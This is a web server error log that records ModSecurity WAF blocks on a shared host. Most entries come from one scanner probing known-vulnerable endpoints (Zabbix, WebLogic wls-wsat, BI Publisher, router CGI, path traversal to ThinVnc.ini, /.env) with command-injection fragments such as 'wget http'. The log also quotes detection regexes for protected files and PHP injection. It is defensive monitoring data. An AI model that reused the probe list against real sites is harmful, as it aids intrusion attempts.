[Tue May 26 12:51:53.983317 2026] [security2:error] [pid 461618:tid 461861] [client 23.94.40.119:60150] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/apply_sec.cgi"] [unique_id "ahVKEVyiSlSCHr1fdr2dDgAAAPY"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/login_pic.asp
[Tue May 26 12:51:54.241085 2026] [cgid:error] [pid 461618:tid 461777] [client 23.94.40.119:60158] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/apply_sec.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in/login_pic.asp
[Tue May 26 12:51:56.755747 2026] [security2:error] [pid 461618:tid 461817] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKFFyiSlSCHr1fdr2dZAAAAMo"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1218096&moderation-hash=0a6cece0db833b873f7e0b1eaf6b5863
[Tue May 26 12:51:56.824550 2026] [security2:error] [pid 461618:tid 461784] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKFFyiSlSCHr1fdr2dXAAAAKk"]
[Tue May 26 12:51:57.600315 2026] [security2:error] [pid 461618:tid 461774] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKFVyiSlSCHr1fdr2dhwAAAJ8"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1218096&moderation-hash=0a6cece0db833b873f7e0b1eaf6b5863
[Tue May 26 12:51:58.678487 2026] [security2:error] [pid 461618:tid 461830] [client 23.94.40.119:33432] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin.php"] [unique_id "ahVKFlyiSlSCHr1fdr2dpwAAANc"]
[Tue May 26 12:51:58.872168 2026] [security2:error] [pid 461618:tid 461875] [client 23.94.40.119:33458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/zabbix/zabbix.php"] [unique_id "ahVKFlyiSlSCHr1fdr2dqwAAAQQ"]
[Tue May 26 12:51:58.873047 2026] [security2:error] [pid 461618:tid 461778] [client 23.94.40.119:33446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/zabbix.php"] [unique_id "ahVKFlyiSlSCHr1fdr2drAAAAKM"]
[Tue May 26 12:51:59.260567 2026] [security2:error] [pid 461618:tid 461802] [client 23.94.40.119:33492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/getcfg.php"] [unique_id "ahVKF1yiSlSCHr1fdr2dywAAALs"]
[Tue May 26 12:51:59.261059 2026] [security2:error] [pid 461618:tid 461858] [client 23.94.40.119:33502] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:name. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:name"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ahVKF1yiSlSCHr1fdr2dygAAAPM"]
[Tue May 26 12:51:59.704584 2026] [security2:error] [pid 461618:tid 461838] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKF1yiSlSCHr1fdr2d3QAAAN8"], referer: https://www.anujtradingco.com/
[Tue May 26 12:51:59.743300 2026] [security2:error] [pid 461618:tid 461866] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKF1yiSlSCHr1fdr2dzQAAAPs"]
[Tue May 26 12:52:00.200273 2026] [security2:error] [pid 461618:tid 461801] [client 74.119.118.27:50040] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahVKGFyiSlSCHr1fdr2eDAAAALo"]
[Tue May 26 12:52:00.452977 2026] [security2:error] [pid 461618:tid 461846] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKGFyiSlSCHr1fdr2eFgAAAOc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157062&moderation-hash=c23f0f591a039229d82b3f206724dd57
[Tue May 26 12:52:00.646335 2026] [security2:error] [pid 461618:tid 461766] [client 74.119.118.15:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahVKGFyiSlSCHr1fdr2eIgAAAJc"]
[Tue May 26 12:52:00.646973 2026] [security2:error] [pid 461618:tid 461819] [client 74.119.118.15:2640] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahVKGFyiSlSCHr1fdr2eIAAAAMw"]
[Tue May 26 12:52:00.833363 2026] [core:error] [pid 461618:tid 461813] [client 23.94.40.119:33536] AH10244: invalid URI path (/3EFh8KsdVozT94vh3rwXZddOvFM/../../ThinVnc.ini)
[Tue May 26 12:52:00.846943 2026] [security2:error] [pid 461618:tid 461832] [client 74.119.118.51:27817] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVKGFyiSlSCHr1fdr2eRAAAANk"]
[Tue May 26 12:52:00.876890 2026] [security2:error] [pid 461618:tid 461835] [client 74.119.118.24:41155] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVKGFyiSlSCHr1fdr2eSgAAANw"]
[Tue May 26 12:52:01.071917 2026] [security2:error] [pid 461618:tid 461833] [client 74.119.118.24:56356] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVKGVyiSlSCHr1fdr2eTwAAANo"]
[Tue May 26 12:52:01.100443 2026] [security2:error] [pid 461618:tid 461752] [client 74.119.118.26:15804] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVKGVyiSlSCHr1fdr2eUQAAAIk"]
[Tue May 26 12:52:01.331028 2026] [cgid:error] [pid 461618:tid 461778] [client 23.94.40.119:33576] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/up.cgi: script not found or unable to stat
[Tue May 26 12:52:01.429833 2026] [security2:error] [pid 461618:tid 461874] [client 23.94.40.119:33580] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/boafrm/formSysCmd"] [unique_id "ahVKGVyiSlSCHr1fdr2eZgAAAQM"]
[Tue May 26 12:52:01.970269 2026] [security2:error] [pid 461618:tid 461807] [client 23.94.40.119:33598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/dashboard/uploadID.php"] [unique_id "ahVKGVyiSlSCHr1fdr2eiQAAAMA"]
[Tue May 26 12:52:02.033747 2026] [security2:error] [pid 461618:tid 461832] [client 23.94.40.119:33612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/pandora_console/index.php"] [unique_id "ahVKGlyiSlSCHr1fdr2eigAAANk"]
[Tue May 26 12:52:02.523397 2026] [fcgid:warn] [pid 461618:tid 461812] (70014)End of file found: [client 23.94.40.119:59908] mod_fcgid: can't get data from http client
[Tue May 26 12:52:02.527569 2026] [fcgid:warn] [pid 461618:tid 461794] (70014)End of file found: [client 23.94.40.119:59918] mod_fcgid: can't get data from http client
[Tue May 26 12:52:02.708463 2026] [security2:error] [pid 461618:tid 461815] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKGlyiSlSCHr1fdr2emAAAAMg"]
[Tue May 26 12:52:02.755268 2026] [security2:error] [pid 461618:tid 461767] [client 23.94.40.119:33636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKGlyiSlSCHr1fdr2etgAAAJg"]
[Tue May 26 12:52:02.756489 2026] [security2:error] [pid 461618:tid 461801] [client 23.94.40.119:33620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/pandora_console/index.php"] [unique_id "ahVKGlyiSlSCHr1fdr2etwAAALo"]
[Tue May 26 12:52:03.363296 2026] [security2:error] [pid 461618:tid 461851] [client 23.94.40.119:33642] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/woocommerce-abandoned-cart/readme.txt"] [unique_id "ahVKG1yiSlSCHr1fdr2fAgAAAOw"]
[Tue May 26 12:52:03.805119 2026] [security2:error] [pid 461618:tid 461760] [client 157.20.138.61:55234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKG1yiSlSCHr1fdr2fBgAAAJE"]
[Tue May 26 12:52:03.805277 2026] [security2:error] [pid 461618:tid 461760] [client 157.20.138.61:55234] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKG1yiSlSCHr1fdr2fBgAAAJE"]
[Tue May 26 12:52:03.821293 2026] [security2:error] [pid 461618:tid 461633] [remote 62.93.179.166:54115] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cagmedya.com"] [uri "/.env"] [unique_id "ahVKG1yiSlSCHr1fdr2fDQAA2g4"]
[Tue May 26 12:52:04.027333 2026] [security2:error] [pid 461618:tid 461750] [client 23.94.40.119:33650] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ahVKHFyiSlSCHr1fdr2fEQAAAIc"]
[Tue May 26 12:52:04.070409 2026] [security2:error] [pid 461618:tid 461866] [client 23.94.40.119:33662] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "wget http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/Collector/storagemgmt/apply"] [unique_id "ahVKHFyiSlSCHr1fdr2fEgAAAPs"]
[Tue May 26 12:52:04.070537 2026] [security2:error] [pid 461618:tid 461866] [client 23.94.40.119:33662] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/Collector/storagemgmt/apply"] [unique_id "ahVKHFyiSlSCHr1fdr2fEgAAAPs"]
[Tue May 26 12:52:04.347132 2026] [security2:error] [pid 461618:tid 461784] [client 23.94.40.119:33668] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVKHFyiSlSCHr1fdr2fFwAAAKk"]
[Tue May 26 12:52:05.912882 2026] [security2:error] [pid 461618:tid 461831] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKHVyiSlSCHr1fdr2fNQAAANg"]
[Tue May 26 12:52:06.240120 2026] [security2:error] [pid 461618:tid 461827] [client 23.94.40.119:33686] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:include ?\\\\( ?(?:\\"|\\\\')? ?http|(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gze?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_n ..." at ARGS:xml. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "840"] [id "380018"] [rev "25"] [msg "Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt"] [data "system \\x22"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/xmlpserver/convert"] [unique_id "ahVKHlyiSlSCHr1fdr2fRgAAANQ"]
[Tue May 26 12:52:07.140241 2026] [security2:error] [pid 461618:tid 461818] [client 23.94.40.119:33694] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/rest/tinymce/1/macro/preview"] [unique_id "ahVKH1yiSlSCHr1fdr2fYAAAAMs"], referer: www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:08.877218 2026] [security2:error] [pid 461618:tid 461763] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKIFyiSlSCHr1fdr2fkQAAAJQ"]
[Tue May 26 12:52:09.367063 2026] [cgid:error] [pid 461618:tid 461829] [client 23.94.40.119:33710] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/file_transfer.cgi: script not found or unable to stat
[Tue May 26 12:52:09.928043 2026] [security2:error] [pid 461618:tid 461752] [client 23.94.40.119:60800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/objects/getImageMP4.php"] [unique_id "ahVKIVyiSlSCHr1fdr2fuQAAAIk"]
[Tue May 26 12:52:09.928418 2026] [security2:error] [pid 461618:tid 461825] [client 23.94.40.119:60796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/objects/getImage.php"] [unique_id "ahVKIVyiSlSCHr1fdr2fugAAANI"]
[Tue May 26 12:52:09.928769 2026] [security2:error] [pid 461618:tid 461791] [client 23.94.40.119:60804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/objects/getSpiritsFromVideo.php"] [unique_id "ahVKIVyiSlSCHr1fdr2fuwAAALA"]
[Tue May 26 12:52:09.941295 2026] [security2:error] [pid 461618:tid 461771] [client 23.94.40.119:60794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "^cmd$" at REQUEST_HEADERS_NAMES:cmd. [file "/opt/mod_security/hg_rules.conf"] [line "901"] [id "900073"] [msg "HTTP_CMD Header attempted"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ahVKIVyiSlSCHr1fdr2fvAAAAJw"]
[Tue May 26 12:52:10.060841 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:60808] ModSecurity: Warning. Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "1439"] [id "9009999"] [msg "8 char spam"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/adxmlrpc.php"] [unique_id "ahVKIlyiSlSCHr1fdr2fwAAAAKE"]
[Tue May 26 12:52:10.094930 2026] [security2:error] [pid 461618:tid 461841] [client 23.94.40.119:60828] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/total-donations/readme.txt"] [unique_id "ahVKIlyiSlSCHr1fdr2fwQAAAOI"]
[Tue May 26 12:52:10.176649 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:60808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/adxmlrpc.php"] [unique_id "ahVKIlyiSlSCHr1fdr2fwAAAAKE"]
[Tue May 26 12:52:10.255438 2026] [security2:error] [pid 461618:tid 461780] [client 23.94.40.119:60842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ahVKIlyiSlSCHr1fdr2fxQAAAKU"]
[Tue May 26 12:52:10.256756 2026] [security2:error] [pid 461618:tid 461831] [client 23.94.40.119:60822] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/node/1"] [unique_id "ahVKIlyiSlSCHr1fdr2fxwAAANg"]
[Tue May 26 12:52:10.290240 2026] [ssl:error] [pid 461618:tid 461755] [client 23.94.40.119:60844] AH02032: Hostname www.madrasbarassociation.org.in.svijaykumar.in provided via SNI and hostname d8akjpc38ndbrs5c98fgkfofu4hsqxkbe.oast.fun provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 12:52:10.290357 2026] [security2:error] [pid 461618:tid 461755] [client 23.94.40.119:60844] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "421"] [hostname "d8akjpc38ndbrs5c98fgkfofu4hsqxkbe.oast.fun"] [uri "/-/jira/login/oauth/access_token"] [unique_id "ahVKIlyiSlSCHr1fdr2fzAAAAIw"]
[Tue May 26 12:52:10.690576 2026] [security2:error] [pid 461618:tid 461857] [client 23.94.40.119:60872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/photo/p/api/album.php"] [unique_id "ahVKIlyiSlSCHr1fdr2f1gAAAPI"]
[Tue May 26 12:52:10.695768 2026] [security2:error] [pid 461618:tid 461805] [client 23.94.40.119:60896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/objects/getImageMP4.php"] [unique_id "ahVKIlyiSlSCHr1fdr2f2QAAAL4"]
[Tue May 26 12:52:11.448293 2026] [security2:error] [pid 461618:tid 461758] [client 23.94.40.119:60920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/plugins/3rdPartyServers/ox3rdPartyServers/max.class.php"] [unique_id "ahVKI1yiSlSCHr1fdr2f8AAAAI8"]
[Tue May 26 12:52:11.467888 2026] [security2:error] [pid 461618:tid 461868] [client 23.94.40.119:60928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/photo/p/api/album.php"] [unique_id "ahVKI1yiSlSCHr1fdr2f8QAAAP0"]
[Tue May 26 12:52:11.529413 2026] [security2:error] [pid 461618:tid 461812] [client 23.94.40.119:60942] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/photo/p/api/album.php"] [unique_id "ahVKI1yiSlSCHr1fdr2f9gAAAMU"]
[Tue May 26 12:52:11.817619 2026] [security2:error] [pid 461618:tid 461844] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKI1yiSlSCHr1fdr2f7wAAAOU"]
[Tue May 26 12:52:12.027849 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:60976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/objects/getSpiritsFromVideo.php"] [unique_id "ahVKJFyiSlSCHr1fdr2gCAAAAKE"]
